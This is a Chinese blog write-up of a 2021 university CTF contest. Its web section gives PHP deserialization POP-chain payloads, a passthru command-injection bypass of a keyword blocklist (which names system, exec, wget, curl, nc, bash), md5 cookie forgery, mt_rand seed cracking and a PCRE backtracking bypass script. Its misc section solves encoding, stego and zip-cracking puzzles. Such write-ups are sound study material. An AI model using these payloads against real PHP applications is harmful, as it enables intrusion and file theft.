2021年“绿盟杯”重庆市大学生信息安全竞赛线上赛-Writeup

于 2021-10-24 01:14:31 发布 2519 收藏 20
分类专栏: CTF_WEB_Writeup CTF_MISC_Writeup 文章标签: 2021绿盟杯
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/120918479
版权

文章目录

在这里插入图片描述

Web

flag在哪里

在这里插入图片描述

 <?php
error_reporting(0);
class begin{
    public $file;
    public $mode;
    public $content;
    public $choice;
    public function __construct()
    {
        $this->file = "file";
        $this->content = "content";
    }
    function __wakeup()
    {
        if($this->mode=="write"){
            $this->choice= new write();
        }
        if($this->mode=="read"){
            $this->choice= new read();
        }
    }
    function __call($file,$content) {
        highlight_file($this->file);
    }
    function __destruct(){
        if($this->mode=="write"){
            $this->choice->writewritetxt($this->file,$this->content);
        }
        else{
            $this->choice->open($this->file);
        }
    }
}
class write{
    public function writewritetxt($file,$content)
    {
        $filename=$file.".txt";
        if(is_file($filename)){
            unlink($filename);
        }
        file_put_contents($filename, $content);
        echo "成功写入";
    }
}
class read{
    public $file;
    public function __construct(){
        $this->file="test.txt";
        echo "欢迎查看  ".$this->file."<br/>";
    }
    function open($filename){
        $file=$this->file;
        if(is_file($file)){
            if($file=="getflag.php"){
                die("getflag.php没东西");
                }
            else{
                highlight_file($file);
                }
        }else{
            echo "文件不存在";
        }
    }
}
function check($dis_content){
    if(preg_match('/system|eval|wget|exec|zip|passthru|netcat|phpinfo|`|shell|\(|\)/i', $dis_content)){
        die("hack !!!");
    }
}
$pop=$_GET['pop'];
if (isset($pop)) {
    check($pop);
    unserialize($pop);
} else {
    highlight_file("index.php");
}
?>   

highlight_file()<-begin::__call()<-begin::open()

<?php 
error_reporting(0);
class begin{
    public $file;
    public $mode;
    public $content;
    public $choice;
    public function __construct()
    {
        $this->file = "getflag.php";
        $this->content = "mochu7";
        $this->mode = "";
    }

}
$res = new begin();
$res->choice = new begin();
echo urlencode(serialize($res));
?>

PS C:\Users\Administrator\Desktop> php -f .\poc.php
O%3A5%3A%22begin%22%3A4%3A%7Bs%3A4%3A%22file%22%3Bs%3A11%3A%22getflag.php%22%3Bs%3A4%3A%22mode%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22content%22%3Bs%3A6%3A%22mochu7%22%3Bs%3A6%3A%22choice%22%3BO%3A5%3A%22begin%22%3A4%3A%7Bs%3A4%3A%22file%22%3Bs%3A11%3A%22getflag.php%22%3Bs%3A4%3A%22mode%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22content%22%3Bs%3A6%3A%22mochu7%22%3Bs%3A6%3A%22choice%22%3BN%3B%7D%7D

getflag.php

<?php
error_reporting(0);
$a=$_POST['a'];    
$b=$_POST['b'];
if(preg_match('/cat|more|less|head|tac|tail|nl|od|vi|sort|cut|ping|curl|nc|grep|system|exec|bash|unique|find|popen|open|ls|rm|sleep|chr|ord|bin|hex|dict|#|`|\$|\<|\(|\[|\]|\{|\}|\)|\>|\_|\'|"|\*|;|\||&|\/|\\\\/is', $a)){
    die("hack!!!!");
}
if(!preg_match('/[a-z]/is', $b))
{
    die("big hack!!!!");
}
call_user_func($b,$a); 

b=passthru&a=dir
b=passthru&a=rev ?f?l?a?g.php

在这里插入图片描述

>>> flag='php?< ;)(tixe ;"}as211-csq-53vd-1vdv-5ads{galf" ohce >?'
>>> flag[::-1]
'?> echo "flag{sda5-vdv1-dv35-qsc-112sa}"; exit(); <?php'

寻宝奇兵

在这里插入图片描述
第一关

<?php             
$SECRET="There is no treasure here";
if (isset($_COOKIE["users"])) {
if($_COOKIE["users"]==="explorer")
{
    die("Explorers are not welcome");
}
$hash = $_COOKIE["hash"];
$users = $_COOKIE["users"];

if($hash === md5($SECRET.$users)){
    echo "<script>alert('恭喜')</script>";
                 }
    } else {
        setcookie("users", "explorer");
        setcookie("hash", md5($SECRET . "explorer"));
}
?>

PS C:\Users\Administrator\Desktop> php -r "var_dump(md5('There is no treasure here'.'mochu7'));"
Command line code:1:
string(32) "d8951489320b4ea46f62d9747c1f587a"

hash=d8951489320b4ea46f62d9747c1f587a
user=mochu7

第二关

<?php
session_start();
if(!isset($_SESSION['seed'])){
	$_SESSION['seed']=rand(0,999999999);
}

mt_srand($_SESSION['seed']);

$table = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$pass='';

for ( $i = 0; $i < 24; $i++ ){
    $pass.=substr($table, mt_rand(0, strlen($table) - 1), 1);   
}

if(isset($_POST['password'])){
    if($pass==$_POST['password']){
			echo "<script >alert('恭喜你')</script>";
}

破解伪随机数,给出了生成伪随机数的前十二位:kv34bCTSCMnW
可以通过这些字符串的位置来反推得到mt_rand(0, strlen($table) - 1)生成的随机数
将伪随机数转换成php_mt_seed可以识别的数据格式

userpass = "kv34bCTSCMnW"
table = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
out_str = ""

for idx1 in range(len(userpass)):
	for idx2 in range(len(table)):
		if userpass[idx1] == table[idx2]:
			out_str += str(idx2)+' '+str(idx2)+' '+'0'+' '+str(len(table)-1)+' '
print(out_str)

PS C:\Users\Administrator\Desktop> python .\code.py
10 10 0 61 21 21 0 61 29 29 0 61 30 30 0 61 1 1 0 61 38 38 0 61 55 55 0 61 54 54 0 61 38 38 0 61 48 48 0 61 13 13 0 61 58 58 0 61

使用php_mt_seed爆破seed

root@mochu7-pc:/mnt/d/Tools/Web/php_mt_seed# ./php_mt_seed 10 10 0 61 21 21 0 61 29 29 0 61 30 30 0 61 1 1 0 61 38 38 0 61 55 55 0 61 54 54 0 61 38 38 0 61 48 48 0 61 13 13 0 61 58 58 0 61
Pattern: EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62
Version: 3.0.7 to 5.2.0
Found 0, trying 0xfc000000 - 0xffffffff, speed 1776.4 Mseeds/s
Version: 5.2.1+
Found 0, trying 0x14000000 - 0x15ffffff, speed 145.3 Mseeds/s
seed = 0x1464b1df = 342143455 (PHP 7.1.0+)
Found 1, trying 0xfe000000 - 0xffffffff, speed 131.4 Mseeds/s
Found 1

然后再生成密码

<?php 
mt_srand(342143455);
$table = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$pass='';

for ( $i = 0; $i < 24; $i++ ){
    $pass.=substr($table, mt_rand(0, strlen($table) - 1), 1);   
}
echo $pass;
 ?>

PS C:\Users\Administrator\Desktop> php -f .\generate.php
kv34bCTSCMnWckt0yshMVbBE

第三关

<?php
function is_php($data){
    return preg_match('/[flag].*[php]/is', $data);
}
if($_POST['treasure'])
{
    if(is_php($_POST['treasure'])) {
        echo "<script >alert('这个不能拿走');</script>";
    } else {
        if(preg_match('/flag.php/is', $_POST['treasure'])){
           highlight_file('flag.php');
      }
    }
} 
?>

这里把正则的返回值作为判断条件,直接可以利用利用PCRE回溯次数限制

import requests

burp0_url = "http://119.61.19.212:57305/treasure.php"
burp0_cookies = {"users": "mochu7", "hash": "d8951489320b4ea46f62d9747c1f587a", "PHPSESSID": "4dg0t8t3g9dtfocod561hjr2c8"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://119.61.19.212:57305", "Connection": "close", "Referer": "http://119.61.19.212:57305/treasure.php", "Upgrade-Insecure-Requests": "1"}
payload = "flag.php" + 'a'*1000000
burp0_data = {"treasure": payload}
res = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

print(res.text)

在这里插入图片描述

mid

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

serialize

在这里插入图片描述

<?php
error_reporting(0);
highlight_file(__FILE__);

class Demo{
    public $class;
    public $user;
    public function __construct()
    {
        $this->class = "safe";
        $this->user = "ctfer";
        $context = new $this->class ($this->user);
        foreach($context as $f){
            echo $f;
        }
    }

    public function __wakeup()
    {
        $context = new $this->class ($this->user);
        foreach($context as $f){
            echo $f;
        }
    }

}
class safe{
    var $user;
    public function __construct($user)
    {
        $this->user = $user;
        echo ("hello ".$this->user);
    }
}


if(isset($_GET['data'])){
    unserialize($_GET['data']);
}
else{
    $demo=new Demo;

直接拼接原生类
poc.php

 <?php
class Demo{
    public $class;
    public $user;
    public function __construct(){
    	$this->class = "FilesystemIterator";
    	$this->user = "./";
    }

}
$res = new Demo();
echo urlencode(serialize($res));
?>

?data=O%3A4%3A%22Demo%22%3A2%3A%7Bs%3A5%3A%22class%22%3Bs%3A18%3A%22FilesystemIterator%22%3Bs%3A4%3A%22user%22%3Bs%3A2%3A%22.%2F%22%3B%7D

在这里插入图片描述

 <?php
class Demo{
    public $class;
    public $user;
    public function __construct(){
    	$this->class = "SplFileObject";
    	$this->user = "./flag.php";
    }

}
$res = new Demo();
echo urlencode(serialize($res));
?>

/?data=O%3A4%3A%22Demo%22%3A2%3A%7Bs%3A5%3A%22class%22%3Bs%3A13%3A%22SplFileObject%22%3Bs%3A4%3A%22user%22%3Bs%3A10%3A%22.%2Fflag.php%22%3B%7D

在这里插入图片描述
查看根目录发现flag
在这里插入图片描述
读取

/?data=O%3A4%3A%22Demo%22%3A2%3A%7Bs%3A5%3A%22class%22%3Bs%3A13%3A%22SplFileObject%22%3Bs%3A4%3A%22user%22%3Bs%3A5%3A%22%2Fflag%22%3B%7D

在这里插入图片描述

Misc

签到1

在这里插入图片描述

PS C:\Users\Administrator> php -r "var_dump(base64_decode('ZmxhZ3tjNTRjZTlkN2I0ZTE3OTgwZGQ0OTA2ZDk5NDFlZDUyYX0='));"
Command line code:1:
string(38) "flag{c54ce9d7b4e17980dd4906d9941ed52a}"

DECODER

在这里插入图片描述
flag_1.txt

base32->base58->base85

042f38b694

flag_2.txt

cipher:👉🦓🏎💵🕹🚪🎤🙃☂☀🌏🛩💵😇🚨🚪🎤👉🔪👣🐎✖☂🎤✉🔪😊🍎🚰🌪🚪🚹🍌🚰🎃🎤💧😎🥋🍎✖🎃👉🍵
key:👮👟👟👡👥👦

调整Rotation
在这里插入图片描述

b52bff9568

flag_3.txt

Base91->Base64隐写

def get_base64_diff_value(s1, s2):
    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    res = 0
    for i in xrange(len(s2)):
        if s1[i] != s2[i]:
            return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
    return res

def solve_stego():
    with open('./1.txt', 'rb') as f:
        file_lines = f.readlines()
        bin_str = ''
        for line in file_lines:
            steg_line = line.replace('\n', '')
            norm_line = line.replace('\n', '').decode('base64').encode('base64').replace('\n', '')
            diff = get_base64_diff_value(steg_line, norm_line)
            print diff
            pads_num = steg_line.count('=')
            if diff:
                bin_str += bin(diff)[2:].zfill(pads_num * 2)
            else:
                bin_str += '0' * pads_num * 2
            print goflag(bin_str)

def goflag(bin_str):
    res_str = ''
    for i in xrange(0, len(bin_str), 8):
        res_str += chr(int(bin_str[i:i + 8], 2))
    return res_str


if __name__ == '__main__':
    solve_stego()

37f267472516

最终flag

flag{042f38b694b52bff956837f267472516}

huahua

在这里插入图片描述

修改文件头
在这里插入图片描述
解压得到png文件,插入四字节文件头
在这里插入图片描述
在这里插入图片描述

flag{b3afc91a8fbb6cc798bdebb253b02550}

NOISE

在这里插入图片描述
在这里插入图片描述
out文件是个wav文件
在这里插入图片描述
改后缀out.wavAudacity打开,查看频谱图
在这里插入图片描述

flag{98ce526ad52c409763405847185d9c6c}

DdDdDd

在这里插入图片描述
DdDdDd.pcap导出HTTP对象

在这里插入图片描述
打开这个最大的文件
在这里插入图片描述
G语言,直接在线编译

右上角调角度
在这里插入图片描述

flag{2fc07441-fd8f-4e1c-9f0f-72aa8c984a}

Forensic

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
flag.zip导不出来,flag.docx有两个,导出来一个有加密,另一个打开有一段隐藏Base64字符
在这里插入图片描述
在这里插入图片描述

PS D:\Tools\Misc\volatility_2.6_win64_standalone> php -r "var_dump(base64_decode('ZmxhZ3s5MDE3Y2VmMjZhMDdiZWI0ZTY2OWE0YTgwNmJjZDliNn0='));"
Command line code:1:
string(38) "flag{9017cef26a07beb4e669a4a806bcd9b6}"

隐藏的数据

在这里插入图片描述
flag.zip伪加密,7zip直接解压,key.docx发现隐藏字符
在这里插入图片描述

$Th1S_1S_P@SSW0Rd#####

在这里插入图片描述
解压出来的flag文件还是zip文件,改后缀再次解压,使用上面的得到的密码发现不对;上ARCHPR爆破一波
在这里插入图片描述
非常常见的四位纯数字密码:0546
解压得到的flag文件还是zip文件,改后缀解压,有密码,直接用前面得到的密码
在这里插入图片描述
解压得到docx文档打开没有flag,修改docx后缀为zip
在这里插入图片描述
解压后grep -rn 'flag{' ./*直接找
在这里插入图片描述
在这里插入图片描述

flag{4de41c0b106051b30cb3c654901b1b06}

something in picture

在这里插入图片描述
在这里插入图片描述
强网杯三体原题

flag{D1mEn5i0nAl_Pr061em}
末初mochu7
关注
  • 10
    点赞
  • 20
    收藏
  • 打赏
    打赏
  • 8
    评论
专栏目录
ctf打卡第三天
jie_a的博客
06-09 125
include("flag.php"); class just4fun { var $enter; var $secret; } if (isset($_GET['pass'])) { $pass = $_GET['pass']; if(get_magic_quotes_gpc()){ $pass=stripslashes($pass); } $o = unserialize($pass); if ($o) { $o-&
CCTF重邮(绿盟_部分解密题WriteUp
焚卷觅光的博客
07-31 4511
CCTF重邮(绿盟_部分解密题0X00   Kungfu解开压缩包,里面就是一个图片(又是那个卖如来神掌的老乞丐),按照脑洞惯例跑Stegsolve。在文件底发现了“key is …..”把它复制出来再说。VF95c0s5XzVyaGtfX3VGTXR9M0Vse251QEUg明显是一个base64加密,放解码器跑出来是这个:T_ysK9_5rhk__uFMt}3El{nu@E 这已经很接近fl
WP-2021绿盟-藏宝图
bin789456的博客
11-02 292
WP 非常有意思,将这个题记下来吧。首先进去是一个藏宝图的界面,然后界面上没啥东西。源代码和包是这样的: 这里是第一关已经解出来的一个包。它的要求比较简单,将这个secret连接user再md5就可以了。 传进去,如上图,就重定向到了cangbaoxiang.php 藏宝箱第二关就难一些了: 以下是它的源码: <link rel="stylesheet" href="css\cangbaoxiang.css"> </head> <body> <f
2021绿盟重庆市大学生信息安全竞赛—Light1ng战队Writeup
Le1a's Blog
10-23 1557
2021绿盟重庆市大学生信息安全竞赛—Light1ng战队Writeup 其余方向Writeup详见pdf:https://wws.lanzoui.com/iWk1ovo0eaj 密码:Le1a Misc Misc1:签到1 题目给了一串base64编码 解码得到flag: flag{c54ce9d7b4e17980dd4906d9941ed52a} Misc2:DECODER 下载附件,打开得到3个txt,应该对应着三个部分的flag flag_1.txt: 042f38b694 base
LCTF Web补题笔记(菜狗前进永不止步)
Assassin
11-20 4695
不得不说比赛真的挺难得…补题吧… Simple blog 首先上来发现文件login.php和admin.php,但是没什么别的,想到文件泄露通过swp得到源码 login.php error_reporting(0); session_start(); define("METHOD", "aes-128-cbc"); include('config.php'); function
南京邮电大学网络攻防训练平台writeup
weixin_34406086的博客
01-06 2143
本文带目录版本:https://findneo.github.io/170924NuptCTFWP/ 南邮CTF平台网址: http://ctf.nuptsast.com/challenges http://ctf.nuptzj.cn/challenges WEB 签到题 nctf{flag_admiaanaaaaaaaaaaa} ctrl+u或右键查看源代码即可。在CTF比赛中,代码...
绿盟NSCTF(CCTF)2017 pwn writeup
jmp esp
07-22 5700
前言比赛有无数值得吐槽的地方,其中最主要的是,题目给了pwn的libc,然而,特么是错的,也就是说虽然给了libc,但是其实还是靠运气/当做没有libc解,顺手记录一下这两个水题。pwn1分析mainint __cdecl main() { alarm(0x1u); setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); p
2018第一届桂林电子科技大学绿盟CTF(部分)
taozijun的博客
05-21 3793
一.黑洞                   题目给了这样一个黑洞图片,拿到图片首先右键看看属性发现挺大的,可以藏一个压缩包然后就是丢进kali虚拟机用,用binwalk查一下发现竟然什么都没有!好吧,那下一步就是丢进010Editor里面看看。看瞎了眼之后发现了一串字符串(在图片文件中一般都看到的是乱码,如果有一串的英文或数字什么的就要怀疑下了),那字符串就放进base64里面解密看看咯。就这样...
CTF writeup: rbash 逃脱方法
samohyes的博客
08-03 2180
今天做了一个rbash逃脱的题目。百度了好久没找到,后来翻墙用了google才找到思路,大致的思路是这位外国友人贡献的。 https://eddy3oy.com/2017/02/28/breaking-out-of-rbash/ 好了,我来说下我的解题过程。 首先,我开始尝试出来可以用echo命令,但是不知道有什么用,其实采用compgen -c就可以知道能用什么命令。 那么输入 echo
i春秋-2016-2017信息安全竞赛 Web writeup 补题 By Assassin
Assassin
08-08 2895
从i春秋上补一补题目,玩了一个假期了,况且也没人疼没人爱的,做题吧…破译首先看到了两拖密文TW5650Y - 0TS UZ50S S0V LZW UZ50WKW 9505KL4G 1X WVMUSL510 S001M0UWV 910VSG S0 WFLW0K510 1X LZW54 WF5KL50Y 2S4L0W4KZ52 L1 50U14214SLW X5L0WKK S0V TSK7WLTS88
第一届桂林电子科技大学绿盟CTF大赛 wp
Xi4or0uji
05-21 2504
misc音频分析拿到一个wav文件,用audacity打开看见很明显是摩斯电码..-. .-.. .- --. .. ... -- --- .-. ... . -.... -.... -.... --. ..- . - --.- .-- 解密就出来了数据包分析分析数据包看见发了个flag.jpg,提出来看一下是真的皮呀..........丢去010看见是个压缩包,里面还有个flag.txt!!激动...
CTF-练习平台 writeup web
heySister
12-20 2万+
bugku Web WriteUp 刚刚接触ctf没多久,做ctf-练习平台上的题目,有些新的题目,在网上没有找到对应的writeup,所以做了之后就想自己写一个,也顺便理理自己的思路。(没有太多经验…可能对有些题目的理解还不深刻…) 签到题 加群在公告里就可以看到flag值了。 Web2 F12,立马就看到flag的值了。 文件上传测试 题目说是...
NJUST CTF 2018 Writeup
qq_37820590的博客
03-17 1878
NJUST CTF 2018 Writeup Supernova, Nanjing Universityfrostwing98,Trap,Arcadia MISC1 签到by Arcadia一路调戏ai之后(误)可以得到一串base64编码的字符串,在线解码得到flagMISC2 GIFby frostwing98下载到gif,发现是不断闪烁的黑/白画面,第一考虑是莫尔斯电码。首先http://tu
【网安随笔】CTF-writeup -环环相扣的隐写
Keylion ,Your Hero
12-06 1328
这是我们这次要破解的源文件。把三个文件都点开看下,发现文档和压缩包都是加密的。正常思路:第一个jpg文件里隐藏了,docx文件的密码,从docx文件里获取压缩包的密码,最后得到flag. 一、地狱伊始.jpg 直接打开发现图形是不显示的,所以要用Winhex去尝试修复,打开文件发现果然文件头是损坏的,这里普及下芝士,jpg的文件头:FF D8 FF 修复保
CTF-练习平台部分writeup
hijack89的博客
04-03 4万+
CTF-练习平台writeupCTF-练习平台MISC滴答~滴看标题基本就知道是摩尔斯密码“.”、”-“,直接在线摩尔斯解密 聪明的小羊小羊。。。老套路 翻栅栏,栅栏密码。。。比较简单,直接看出来是两栏加密 KEY{sad23jjdsa2}这是一张单纯的图片??看题目估计是道隐写术的题,先保存图片的说; 30分的题,估计不会太难,直接文本编辑器打开;文本末尾发现了一行转义序列: 看来这
记一次CTF过程(Writeup)
_Ralph的博客
01-17 4万+
前言在i春秋平台看到几个ctf练习题,就点进去看看吧,能做就做不能做说明水平有限,还要继续加油(革命尚未成功,同志仍需努力)O(∩_∩)O哈哈~第一题:Robot题目名称:Robot有没有觉得这个题目很熟悉?没错robots.txt!很熟悉。可能解题思路就和robots.txt有关了。访问链接,网页显示位一张机器人的图片,没什么信息,网页源代码同样没有什么具有价值的信息。那我们就抓个包看看吧,用b
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
php反序列化之字符逃逸
最新发布
qq_53856457的博客
05-14 512
php反序列化之字符逃逸法 1.按我的理解,反序列化的过程就是碰到;}与最前面的{配对后,便停止反序列化。如下序列化: <?php class Test { public $a = "aa"; public $b = "bbb"; public $c = "cccc"; } $qwe = new Test(); echo serialize($qwe); 输出序列化结果为:O:4:“Test”:3:{s:1:“a”;s:2:“aa”;s:1:“b”;s:3:“bbb”;s:1:“c”;

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末初mochu7

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值